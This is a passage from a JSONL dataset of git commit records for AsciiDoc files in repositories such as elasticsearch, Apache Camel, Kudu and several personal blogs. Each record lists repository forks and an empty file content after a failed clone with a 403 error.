rch,markllama\/elasticsearch,fforbeck\/elasticsearch,amaliujia\/elasticsearch,loconsolutions\/elasticsearch,vrkansagara\/elasticsearch,knight1128\/elasticsearch,camilojd\/elasticsearch,j
champion\/elasticsearch,palecur\/elasticsearch,rhoml\/elasticsearch,markwalkom\/elasticsearch,ThalaivaStars\/OrgRepo1,szroland\/elasticsearch,mcku\/elasticsearch,vingupta3\/elasticsearch,yongminxia\/elasticsearch,anti-social\/elasticsearch,springning\/elasticsearch,easonC\/elasticsearch,MichaelLiZhou\/elasticsearch,mohit\/elasticsearch,vvcephei\/elasticsearch,Helen-Zhao\/elasticsearch,sc0ttkclark\/elasticsearch,yuy168\/elasticsearch,Charlesdong\/elasticsearch,nknize\/elasticsearch,Clairebi\/ElasticsearchClone,khiraiwa\/elasticsearch,ImpressTV\/elasticsearch,henakamaMSFT\/elasticsearch,MisterAndersen\/elasticsearch,huypx1292\/elasticsearch,EasonYi\/elasticsearch,sarwarbhuiyan\/elasticsearch,khiraiwa\/elasticsearch,codebunt\/elasticsearch,jeteve\/elasticsearch,18098924759\/elasticsearch,Uiho\/elasticsearch,nknize\/elasticsearch,yongminxia\/elasticsearch,socialrank\/elasticsearch,easonC\/elasticsearch,ImpressTV\/elasticsearch,Brijeshrpatel9\/elasticsearch,yynil\/elasticsearch,xingguang2013\/elasticsearch,LeoYao\/elasticsearch,feiqitian\/elasticsearch,SergVro\/elasticsearch,iamjakob\/elasticsearch,LeoYao\/elasticsearch,hanswang\/elasticsearch,ulkas\/elasticsearch,nknize\/elasticsearch,thecocce\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mapr\/elasticsearch,StefanGor\/elasticsearch,a2lin\/elasticsearch,AshishThakur\/elasticsearch,HarishAtGitHub\/elasticsearch,iacdingping\/elasticsearch,Brijeshrpatel9\/elasticsearch,pozhidaevak\/elasticsearch,lydonchandra\/elasticsearch,Clairebi\/ElasticsearchClone,Flipkart\/elasticsearch,njlawton\/elasticsearch,achow\/elasticsearch,dylan8902\/elasticsearch,mcku\/elasticsearch,strapdata\/elassandra-test,nazarewk\/elasticsearch,iantruslove\/elasticsearch,mute\/elasticsearch,nomoa\/elasticsearch,s1monw\/elasticsearch,coding0011\/elasticsearch,glefloch\/elasticsearch,petabytedata\/elasticsearch,wuranbo\/elasticsearch,loconsolutions\/elasticsearch,pablocastro\/elasticsearch,lmtwga\/elasticsearch,iamjakob\/elasticsearch,mrorii\/elasticsearch,mikemccand\/elasticsearch,vingupta3\/elasticsearch,mgalushka\/elasticsearch,Brijeshrpatel9\/elasticsearch,awislowski\/elasticsearch,zhiqinghuang\/elasticsearch,sreeramjayan\/elasticsearch,overcome\/elasticsearch,jimhooker2002\/elasticsearch,a2lin\/elasticsearch,khiraiwa\/elasticsearch,hanst\/elasticsearch,Liziyao\/elasticsearch,caengcjd\/elasticsearch,onegambler\/elasticsearch,likaiwalkman\/elasticsearch,luiseduardohdbackup\/elasticsearch,LewayneNaidoo\/elasticsearch,rajanm\/elasticsearch,pranavraman\/elasticsearch,beiske\/elasticsearch,maddin2016\/elasticsearch,jimhooker2002\/elasticsearch,geidies\/elasticsearch,xingguang2013\/elasticsearch,zeroctu\/elasticsearch,MetSystem\/elasticsearch,StefanGor\/elasticsearch,mcku\/elasticsearch,robin13\/elasticsearch,sjohnr\/elasticsearch,wangyuxue\/elasticsearch,ulkas\/elasticsearch,loconsolutions\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,cwurm\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,liweinan0423\/elasticsearch,vingupta3\/elasticsearch,ZTE-PaaS\/elasticsearch,mcku\/elasticsearch,F0lha\/elasticsearch,palecur\/elasticsearch,rento19962\/elasticsearch,fred84\/elasticsearch,phani546\/elasticsearch,kunallimaye\/elasticsearch,Liziyao\/elasticsearch,MjAbuz\/elasticsearch,rlugojr\/elasticsearch,dpursehouse\/elasticsearch,karthikjaps\/elasticsearch,dpursehouse\/elasticsearch,wbowling\/elasticsearch,martinstuga\/elasticsearch,spiegela\/elasticsearch,mnylen\/elasticsearch,gingerwizard\/elasticsearch,F0lha\/elasticsearch,HonzaKral\/elasticsearch,beiske\/elasticsearch,mm0\/elas
ticsearch,PhaedrusTheGreek\/elasticsearch,bestwpw\/elasticsearch,javachengwc\/elasticsearch,diendt\/elasticsearch,schonfeld\/elasticsearch,zkidkid\/elasticsearch,ivansun1010\/elasticsearch,umeshdangat\/elasticsearch,amit-shar\/elasticsearch,smflorentino\/elasticsearch,PhaedrusTheGreek\/elasticsearch,zhiqinghuang\/elasticsearch,Uiho\/elasticsearch,strapdata\/elassandra5-rc,humandb\/elasticsearch,rmuir\/elasticsearch,Shekharrajak\/elasticsearch,lchennup\/elasticsearch,Helen-Zhao\/elasticsearch,thecocce\/elasticsearch,EasonYi\/elasticsearch,ricardocerq\/elasticsearch,ImpressTV\/elasticsearch,mortonsykes\/elasticsearch,linglaiyao1314\/elasticsearch,Brijeshrpatel9\/elasticsearch,18098924759\/elasticsearch,markharwood\/elasticsearch,socialrank\/elasticsearch,mjason3\/elasticsearch,SergVro\/elasticsearch,jsgao0\/elasticsearch,Fsero\/elasticsearch,anti-social\/elasticsearch,jprante\/elasticsearch,areek\/elasticsearch,nilabhsagar\/elasticsearch,mm0\/elasticsearch,fekaputra\/elasticsearch,winstonewert\/elasticsearch,yuy168\/elasticsearch,MichaelLiZhou\/elasticsearch,huypx1292\/elasticsearch,hirdesh2008\/elasticsearch,Liziyao\/elasticsearch,hanswang\/elasticsearch,hirdesh2008\/elasticsearch,andrestc\/elasticsearch,rhoml\/elasticsearch,wenpos\/elasticsearch,achow\/elasticsearch,hanswang\/elasticsearch,YosuaMichael\/elasticsearch,Helen-Zhao\/elasticsearch,rento19962\/elasticsearch,myelin\/elasticsearch,EasonYi\/elasticsearch,kcompher\/elasticsearch,hydro2k\/elasticsearch,mjason3\/elasticsearch,ulkas\/elasticsearch,sposam\/elasticsearch,jbertouch\/elasticsearch,strapdata\/elassandra,bawse\/elasticsearch,jeteve\/elasticsearch,mrorii\/elasticsearch,nrkkalyan\/elasticsearch,kimimj\/elasticsearch,vvcephei\/elasticsearch,milodky\/elasticsearch,avikurapati\/elasticsearch,Fsero\/elasticsearch,alexbrasetvik\/elasticsearch,pranavraman\/elasticsearch,SergVro\/elasticsearch,AndreKR\/elasticsearch,ESamir\/elasticsearch,sneivandt\/elasticsearch,zeroctu\/elasticsearch,cnfire\/elasticsearch-1,pozhidaevak\/elasticsearch,mcku\/elasticsearch,dataduke\/elasticsearch,codebunt\/elasticsearch,yynil\/elasticsearch,anti-social\/elasticsearch,mmaracic\/elasticsearch,ydsakyclguozi\/elasticsearch,mortonsykes\/elasticsearch,davidvgalbraith\/elasticsearch,queirozfcom\/elasticsearch,mjason3\/elasticsearch,springning\/elasticsearch,luiseduardohdbackup\/elasticsearch,wbowling\/elasticsearch,truemped\/elasticsearch,artnowo\/elasticsearch,mjhennig\/elasticsearch,rajanm\/elasticsearch,knight1128\/elasticsearch,btiernay\/elasticsearch,rhoml\/elasticsearch,jprante\/elasticsearch,ricardocerq\/elasticsearch,Stacey-Gammon\/elasticsearch,areek\/elasticsearch,sauravmondallive\/elasticsearch,rento19962\/elasticsearch,dpursehouse\/elasticsearch,iamjakob\/elasticsearch,schonfeld\/elasticsearch,vietlq\/elasticsearch,mm0\/elasticsearch,JervyShi\/elasticsearch,girirajsharma\/elasticsearch,jw0201\/elastic,wittyameta\/elasticsearch,Brijeshrpatel9\/elasticsearch,sauravmondallive\/elasticsearch,zhiqinghuang\/elasticsearch,zkidkid\/elasticsearch,Siddartha07\/elasticsearch,wayeast\/elasticsearch,Clairebi\/ElasticsearchClone,overcome\/elasticsearch,fernandozhu\/elasticsearch,sjohnr\/elasticsearch,mkis-\/elasticsearch,wittyameta\/elasticsearch,jsgao0\/elasticsearch,thecocce\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,mapr\/elasticsearch,mrorii\/elasticsearch,StefanGor\/elasticsearch,mm0\/elasticsearch,wittyameta\/elasticsearch,Rygbee\/elasticsearch,jw0201\/elastic,sneivandt\/elasticsearch,camilojd\/elasticsearch,kcompher\/elasticsearch,apepper\/elast
icsearch,btiernay\/elasticsearch,pablocastro\/elasticsearch,bestwpw\/elasticsearch,KimTaehee\/elasticsearch,javachengwc\/elasticsearch,rento19962\/elasticsearch,jpountz\/elasticsearch,tkssharma\/elasticsearch,tahaemin\/elasticsearch,aglne\/elasticsearch,jaynblue\/elasticsearch,markharwood\/elasticsearch,mjason3\/elasticsearch,kunallimaye\/elasticsearch,nellicus\/elasticsearch,apepper\/elasticsearch,ivansun1010\/elasticsearch,djschny\/elasticsearch,lzo\/elasticsearch-1,maddin2016\/elasticsearch,kevinkluge\/elasticsearch,rlugojr\/elasticsearch,weipinghe\/elasticsearch,yuy168\/elasticsearch,areek\/elasticsearch,karthikjaps\/elasticsearch,truemped\/elasticsearch,avikurapati\/elasticsearch,sdauletau\/elasticsearch,truemped\/elasticsearch,jimhooker2002\/elasticsearch,wangtuo\/elasticsearch,mapr\/elasticsearch,wimvds\/elasticsearch,drewr\/elasticsearch,hafkensite\/elasticsearch,LewayneNaidoo\/elasticsearch,xpandan\/elasticsearch,geidies\/elasticsearch,hirdesh2008\/elasticsearch,pablocastro\/elasticsearch,vroyer\/elasticassandra,nilabhsagar\/elasticsearch,caengcjd\/elasticsearch,SergVro\/elasticsearch,vvcephei\/elasticsearch,tkssharma\/elasticsearch,strapdata\/elassandra-test,amaliujia\/elasticsearch,amaliujia\/elasticsearch,tebriel\/elasticsearch,henakamaMSFT\/elasticsearch,mnylen\/elasticsearch,wimvds\/elasticsearch,adrianbk\/elasticsearch,jimhooker2002\/elasticsearch,markharwood\/elasticsearch,lmtwga\/elasticsearch,golubev\/elasticsearch,jchampion\/elasticsearch,hydro2k\/elasticsearch,obourgain\/elasticsearch,sc0ttkclark\/elasticsearch,palecur\/elasticsearch,Siddartha07\/elasticsearch,snikch\/elasticsearch,jbertouch\/elasticsearch,sarwarbhuiyan\/elasticsearch,ydsakyclguozi\/elasticsearch,strapdata\/elassandra-test,KimTaehee\/elasticsearch,Flipkart\/elasticsearch,rmuir\/elasticsearch,nellicus\/elasticsearch,jango2015\/elasticsearch,i-am-Nathan\/elasticsearch,wittyameta\/elasticsearch,Siddartha07\/elasticsearch,AshishThakur\/elasticsearch,MaineC\/elasticsearch,acchen97\/elasticsearch,sposam\/elasticsearch,sjohnr\/elasticsearch,nezirus\/elasticsearch,bawse\/elasticsearch,socialrank\/elasticsearch,glefloch\/elasticsearch,infusionsoft\/elasticsearch,aglne\/elasticsearch,weipinghe\/elasticsearch,yanjunh\/elasticsearch,smflorentino\/elasticsearch,jeteve\/elasticsearch,andrestc\/elasticsearch,avikurapati\/elasticsearch,fekaputra\/elasticsearch,scottsom\/elasticsearch,sarwarbhuiyan\/elasticsearch,rajanm\/elasticsearch,trangvh\/elasticsearch,vrkansagara\/elasticsearch,gmarz\/elasticsearch,sc0ttkclark\/elasticsearch,bestwpw\/elasticsearch,apepper\/elasticsearch,strapdata\/elassandra,ZTE-PaaS\/elasticsearch,wbowling\/elasticsearch,milodky\/elasticsearch,jaynblue\/elasticsearch,beiske\/elasticsearch,iacdingping\/elasticsearch,gingerwizard\/elasticsearch,maddin2016\/elasticsearch,iamjakob\/elasticsearch,kaneshin\/elasticsearch,gfyoung\/elasticsearch,Clairebi\/ElasticsearchClone,jprante\/elasticsearch,ZTE-PaaS\/elasticsearch,Fsero\/elasticsearch,sjohnr\/elasticsearch,humandb\/elasticsearch,brandonkearby\/elasticsearch,YosuaMichael\/elasticsearch,achow\/elasticsearch,lks21c\/elasticsearch,sarwarbhuiyan\/elasticsearch,Collaborne\/elasticsearch,wuranbo\/elasticsearch,sdauletau\/elasticsearch,abibell\/elasticsearch,Charlesdong\/elasticsearch,iacdingping\/elasticsearch,acchen97\/elasticsearch,Flipkart\/elasticsearch,MetSystem\/elasticsearch,hanswang\/elasticsearch,mm0\/elasticsearch,likaiwalkman\/elasticsearch,Widen\/elasticsearch,andrejserafim\/elasticsearch,Kakakakakku\/elasticsearch,tsohil\/elasticsearch,infusio
nsoft\/elasticsearch,hafkensite\/elasticsearch,scorpionvicky\/elasticsearch,jimczi\/elasticsearch","old_file":"docs\/resiliency\/index.asciidoc","new_file":"docs\/resiliency\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"21f9ce8f303ff552e891f921cb137eace5c1e425","subject":"y2b create post Call of Duty MW3 Special Edition Jeep!","message":"y2b create post Call of Duty MW3 Special Edition Jeep!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-02-27-Call-of-Duty-MW3-Special-Edition-Jeep.adoc","new_file":"_posts\/2012-02-27-Call-of-Duty-MW3-Special-Edition-Jeep.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"209b72451b34a81946821552f6864216bf26bc27","subject":"new poem. ty","message":"new poem. ty\n","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/talks\/ty.adoc","new_file":"content\/talks\/ty.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e7ff5b62a757b2b68033d750ec56af91814c53c6","subject":"Fixed another link","message":"Fixed another link\n","repos":"netdava\/jbakery,netdava\/jbakery","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netdava\/jbakery.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b44527dbaf92ee382a8c19f2053b619e68f23682","subject":"fix doc error","message":"fix doc error","repos":"adessaigne\/camel,apache\/camel,christophd\/camel,cunningt\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,pax95\/camel,cunningt\/camel,apache\/camel,cunningt\/camel,christophd\/camel,apache\/camel,pax95\/camel,tadayosi\/camel,pax95\/camel,tadayosi\/camel,tadayosi\/camel,christophd\/camel,adessaigne\/camel,adessaigne\/camel,adessaigne\/camel,pax95\/camel,cunningt\/camel,adessaigne\/camel,tadayosi\/camel,apache\/camel,pax95\/camel,adessaigne\/camel,apache\/camel,cunningt\/camel,christophd\/camel,christophd\/camel,apache\/camel,tadayosi\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/route-configuration.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/route-configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"02e2bbfe5f8ce4966d251b3d19c3697dd1525f71","subject":"v2.07 - minor","message":"v2.07 - minor\n","repos":"dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"release_notes.asciidoc","new_file":"release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a4065830b89dd26e16bd0563aa0e69e03534c708","subject":"Include a document describing the rules to contributing to the spec's documentation","message":"Include a document describing the rules to contributing to the spec's documentation\n","repos":"jsr377\/jsr377-api","old_file":"spec\/CONTRIBUTING.adoc","new_file":"spec\/CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsr377\/jsr377-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a620d73b0035918cb92624d134cf885e6b5067a1","subject":"Update 2016-07-15-test.adoc","message":"Update 2016-07-15-test.adoc","repos":"timyklam\/timyklam.github.io,timyklam\/timyklam.github.io,timyklam\/timyklam.github.io,timyklam\/timyklam.github.io","old_file":"_posts\/2016-07-15-test.adoc","new_file":"_posts\/2016-07-15-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/timyklam\/timyklam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b5d12f0af1f817aa5dc7b4310d587f4921adbd8","subject":"Update 2016-12-31-blog.adoc","message":"Update 2016-12-31-blog.adoc","repos":"Jekin6\/blog,Jekin6\/blog,Jekin6\/blog,Jekin6\/blog","old_file":"_posts\/2016-12-31-blog.adoc","new_file":"_posts\/2016-12-31-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Jekin6\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"831a66ad4f35b10932c9ff3463f98ea93a07e099","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"255ed8db801d6f15549435743df37283090f33f9","subject":"added more types to RPC asciidoc","message":"added more types to RPC asciidoc\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"trex_rpc_server_spec.asciidoc","new_file":"trex_rpc_server_spec.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aa240e4831afa992d2fb42a093735aad202b2eb6","subject":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","message":"Update 
2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ec24244425a2ba73843772eb1f14b0c3bb4e588","subject":"[DOCS] Add query reference docs template (#52292)","message":"[DOCS] Add query reference docs template (#52292)\n\n","repos":"scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/query-dsl\/_query-template.asciidoc","new_file":"docs\/reference\/query-dsl\/_query-template.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"61a956ea6b2530e4ee3930eacba2290cc36d23b8","subject":"fix metadata","message":"fix metadata\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_posts\/2017-09-01-fud5-day3.adoc","new_file":"_posts\/2017-09-01-fud5-day3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6e627cccc9f85bc34da7ef003b40673bbe253ac","subject":"Renamed '_posts\/2017-05-31-A-test.adoc' to '_posts\/2017-05-31-TWCTF-2017.adoc'","message":"Renamed '_posts\/2017-05-31-A-test.adoc' to '_posts\/2017-05-31-TWCTF-2017.adoc'","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-05-31-TWCTF-2017.adoc","new_file":"_posts\/2017-05-31-TWCTF-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"018945fee409b45eee77f068ba72769afdffbf06","subject":"Only working on some documentation [ci skip]","message":"Only working on some documentation [ci 
skip]\n","repos":"woq-blended\/blended,lefou\/blended,lefou\/blended,woq-blended\/blended","old_file":"BUILDING.adoc","new_file":"BUILDING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lefou\/blended.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d2cbb3d7bf89ef3056d383ef5f210bab633a011c","subject":"Update 2016-03-04-Friday-Favorites-What-is-your-favorite-character-topiary-at-the-Epcot-International-Flower-and-Garden-Festival.adoc","message":"Update 2016-03-04-Friday-Favorites-What-is-your-favorite-character-topiary-at-the-Epcot-International-Flower-and-Garden-Festival.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-04-Friday-Favorites-What-is-your-favorite-character-topiary-at-the-Epcot-International-Flower-and-Garden-Festival.adoc","new_file":"_posts\/2016-03-04-Friday-Favorites-What-is-your-favorite-character-topiary-at-the-Epcot-International-Flower-and-Garden-Festival.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6f29f06e1095ed8c4ef921493e64ccf57e3ed73","subject":"Contributing Guidelines - Initial","message":"Contributing Guidelines - Initial\n","repos":"dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"975cb5cdbe0e75c28a05544357d6779bfcbf6463","subject":"docs: add 1.5.0 release note for tablet copying and flushing improvements","message":"docs: add 1.5.0 release note for tablet copying and\nflushing improvements\n\nChange-Id: Idf254bfcad27b66e8fa515be92285c876332a0be\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/7862\nTested-by: Kudu Jenkins\nReviewed-by: Dan Burkert <4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\n","repos":"cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"a743b90e4f21f9c048272969909a2b0ef3ec8204","subject":"Added a changelog file. (#199)","message":"Added a changelog file. (#199)\n\n* Added a changelog file.\r\n\r\n* Adds 2.0.0 section referencing the migration guide.\r\n\r\nCo-authored-by: Travis Tomsu <a84abf9ad8bcdf860b5ba5a9422abb745190f5c9@google.com>","repos":"GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GoogleCloudPlatform\/spring-cloud-gcp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f9ee398899a564ffad58f38884ce49f9bcaba923","subject":"Add missing release date in changelog","message":"Add missing release date in changelog","repos":"rumpelsepp\/pynote","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db541d6fbe3daecec91bb7701aacfcd284662c2a","subject":"Docs: Add warning about allow_primary to the cluster reroute docs","message":"Docs: Add warning about allow_primary to the cluster reroute docs\n\nCloses #12503\n","repos":"wittyameta\/elasticsearch,mohit\/elasticsearch,hanswang\/elasticsearch,trangvh\/elasticsearch,bawse\/elasticsearch,hydro2k\/elasticsearch,adrianbk\/elasticsearch,wenpos\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,andrestc\/elasticsearch,dongjoon-hyun\/elasticsearch,himanshuag\/elasticsearch,sdauletau\/elasticsearch,likaiwalkman\/elasticsearch,mikemccand\/elasticsearch,rmuir\/elasticsearch,scorpionvicky\/elasticsearch,Fsero\/elasticsearch,robin13\/elasticsearch,ESamir\/elasticsearch,Ansh90\/elasticsearch,episerver\/elasticsearch,kevinkluge\/elasticsearch,brandonkearby\/elasticsearch,polyfractal\/elasticsearch,nomoa\/elasticsearch,hanswang\/elasticsearch,winstonewert\/elasticsearch,jeteve\/elasticsearch,gingerwizard\/elasticsearch,achow\/elasticsearch,myelin\/elasticsearch,mjhennig\/elasticsearch,queirozfcom\/elasticsearch,Stacey-Gammon\/elasticsearch,rhoml\/elasticsearch,pozhidaevak\/elasticsearch,mbrukman\/elasticsearch,kevinkluge\/elasticsearch,awislowski\/elasticsearch,Shekharrajak\/elasticsearch,Liziyao\/elasticsearch,sarwarbhuiyan\/elasticsearch,JackyMai\/elasticsearch,mm0\/elasticsearch,onegambler\/elasticsearch,spiegela\/elasticsearch,strapdata\/elassandra5-rc,hafkensite\/elasticsearch,kevinkluge\/elasticsearch,huanzhong\/elasticsearch,Brijeshrpatel9\/elasticsearch,henakamaMSFT\/elasticsearch,petabytedata\/elasticsearch,slavau\/elasticsearch,Chhunlong\/elasticsearch,camilojd\/elasticsearch,vietlq\/elasticsearch,jango2015\/elast